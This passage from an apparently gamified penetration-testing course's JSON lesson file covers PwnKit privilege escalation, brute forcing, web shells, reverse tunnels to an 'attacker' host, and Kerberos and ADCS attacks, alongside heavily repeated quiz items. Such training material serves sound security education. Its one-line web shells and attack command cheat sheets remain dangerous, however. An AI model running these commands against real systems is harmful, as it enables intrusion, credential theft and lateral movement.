runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"g-pe-linux-pkexec","cat":"Privilege Escalation","title":"PwnKit CVE-2021-4034 Detailed","diff":2,"xp":150,"intro":"Memory corruption in pkexec for instant root.","sections":[{"type":"text","content":"Memory corruption in pkexec for instant root."},{"type":"code","lang":"bash","content":"ls -la /usr/bin/pkexec  # check SUID\npkexec --version\n# Exploit\npython3 CVE-2021-4034.py\n# Or C version\ngcc pwnkit.c -o pwnkit && ./pwnkit"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"PwnKit affects...","opts":["Only Ubuntu","Nearly every Linux from 2009-2022","Only Fedora","Only Debian"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"g-ex-gobuster-bruteforce","cat":"Exploitation","title":"Credential Brute Forcing","diff":1,"xp":75,"intro":"Systematically guess passwords for various services.","sections":[{"type":"text","content":"Systematically guess passwords for various services."},{"type":"code","lang":"bash","content":"# SSH\nhydra -l admin -P wordlist.txt ssh://target\n# FTP\nhydra -l admin -P wordlist.txt ftp://target\n# HTTP Basic Auth\nhydra -l admin -P wordlist.txt target http-get /admin"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Brute force attacks try...","opts":["One password","Every password in a wordlist against the target","Random passwords","No passwords"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"g-ex-medusa","cat":"Exploitation","title":"Medusa Password Cracker","diff":2,"xp":150,"intro":"Parallel network brute forcer.","sections":[{"type":"text","content":"Parallel network brute forcer."},{"type":"code","lang":"bash","content":"medusa -h target -u admin -P wordlist.txt -M ssh\nmedusa -h target -U users.txt -P pass.txt -M ftp\nmedusa -h target -u admin -P pass.txt -M http -m DIR:/admin"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Medusa differs from Hydra by...","opts":["Being slower","Being more modular and supporting parallel hosts","Using GPU","Being Python-based"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Vulnerability Expert","Centralized Vuln Evaluator"],"ans":0},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"g-ex-enum-webshell","cat":"Exploitation","title":"Web Shell Varieties","diff":2,"xp":150,"intro":"Different web shell types for different servers.","sections":[{"type":"text","content":"Different web shell types for different servers."},{"type":"code","lang":"bash","content":"# PHP: <?php system($_GET['cmd']); ?>\n# ASP: <%eval request('cmd')%>\n# JSP: <%Runtime.getRuntime().exec(request.getParameter('cmd'));%>\n# Python: import os; os.popen(input()).read()"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Web shells accept commands via...","opts":["SSH","HTTP requests (GET/POST parameters)","DNS","ICMP"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Vulnerability Expert","Centralized Vuln Evaluator"],"ans":0},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"g-ex-chisel-tunnel","cat":"Exploitation","title":"Chisel Tunneling","diff":2,"xp":150,"intro":"HTTP-based port forwarding and SOCKS proxy.","sections":[{"type":"text","content":"HTTP-based port forwarding and SOCKS proxy."},{"type":"code","lang":"bash","content":"# Server (attacker)\nchisel server --reverse --port 8080\n# Client (target)\nchisel client attacker:8080 R:socks\n# Forward specific port\nchisel client attacker:8080 R:3306:db.internal:3306"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Chisel tunnels over...","opts":["SSH","HTTP/WebSocket","DNS","ICMP"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"g-ex-ligolo-ng","cat":"Exploitation","title":"Ligolo-ng Network Pivoting","diff":3,"xp":200,"intro":"Modern transparent network pivoting.","sections":[{"type":"text","content":"Modern transparent network pivoting."},{"type":"code","lang":"bash","content":"# Proxy (attacker)\nligolo-proxy -selfcert -laddr 0.0.0.0:11601\n# Agent (target)\nligolo-agent -connect attacker:11601 -retry\n# Add route\n>> tunnel_start\n>> ifconfig\nsudo ip route add 10.0.0.0/24 dev ligolo"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Ligolo-ng's advantage over chisel...","opts":["Being slower","Transparent routing without proxychains","Being simpler","Using Python"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Vulnerability Expert","Centralized Vuln Evaluator"],"ans":0},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"g-ex-rubeus","cat":"Exploitation","title":"Rubeus Kerberos Toolkit","diff":3,"xp":200,"intro":"Windows Kerberos manipulation tool.","sections":[{"type":"text","content":"Windows Kerberos manipulation tool."},{"type":"code","lang":"bash","content":"Rubeus.exe kerberoast /outfile:hashes.txt\nRubeus.exe asreproast\nRubeus.exe asktgt /user:admin /rc4:HASH /ptt\nRubeus.exe monitor /interval:5"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Rubeus operates on...","opts":["Network packets","Kerberos tickets and authentication","Files","Registry"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"g-ex-certipy","cat":"Exploitation","title":"Certipy ADCS Exploitation","diff":4,"xp":250,"intro":"Exploit Active Directory Certificate Services.","sections":[{"type":"text","content":"Exploit Active Directory Certificate Services."},{"type":"code","lang":"bash","content":"certipy find -u user@domain -p pass -dc-ip DC -vulnerable\ncertipy req -u user -p pass -ca CA -template VulnTemplate -upn admin@domain\ncertipy auth -pfx admin.pfx"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Certipy exploits...","opts":["Web vulnerabilities","Misconfigured AD certificate templates","Network protocols","File permissions"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Vulnerability Expert","Centralized Vuln Evaluator"],"ans":0},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A 